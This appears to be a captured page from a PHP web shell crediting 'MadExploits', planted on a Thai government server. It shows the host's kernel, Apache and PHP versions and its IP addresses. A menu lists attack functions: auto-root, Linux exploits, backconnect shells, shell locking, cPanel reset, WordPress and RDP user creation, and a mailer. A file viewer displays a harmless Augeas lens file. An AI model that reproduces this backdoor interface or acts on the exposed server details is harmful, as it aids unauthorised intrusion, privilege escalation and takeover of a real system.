Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
augeas /
lenses /
[ HOME SHELL ]
Name
Size
Permission
Action
dist
[ DIR ]
drwxr-xr-x
abrt.aug
321
B
-rw-r--r--
libreport.aug
1.02
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : libreport.aug
module Libreport = autoload xfm (* Define useful primitives *) let value_sep = del / ?= ?/ " = " let value_to_eol = store /([^ \t\n].*[^ \t\n]|[^ \t\n]?)/ let eol = del /\n/ "\n" let ident = /[a-zA-Z][a-zA-Z_]+/ (* Define comment *) let comment = [ label "#comment" . del /#[ \t]*/ "# " . value_to_eol . eol ] (* Define empty *) let empty = [ del /[ \t]*\n/ "\n" ] (* Define option *) let option = [ del /[ \t]*/ "" . key ident . value_sep . value_to_eol . eol ] (* Define lens *) let lns = ( comment | empty | option )* let filter = (incl "/etc/libreport/plugins/*") . (incl "/etc/libreport/events/*") . (incl (Sys.getenv("HOME") . "/.config/abrt/settings/*")) . (incl (Sys.getenv("XDG_CACHE_HOME") . "/abrt/events/*")) . (incl (Sys.getenv("HOME") . "/.cache/abrt/events/*")) . (excl "/etc/libreport/events/*.xml") . Util.stdexcl let xfm = transform lns filter
Close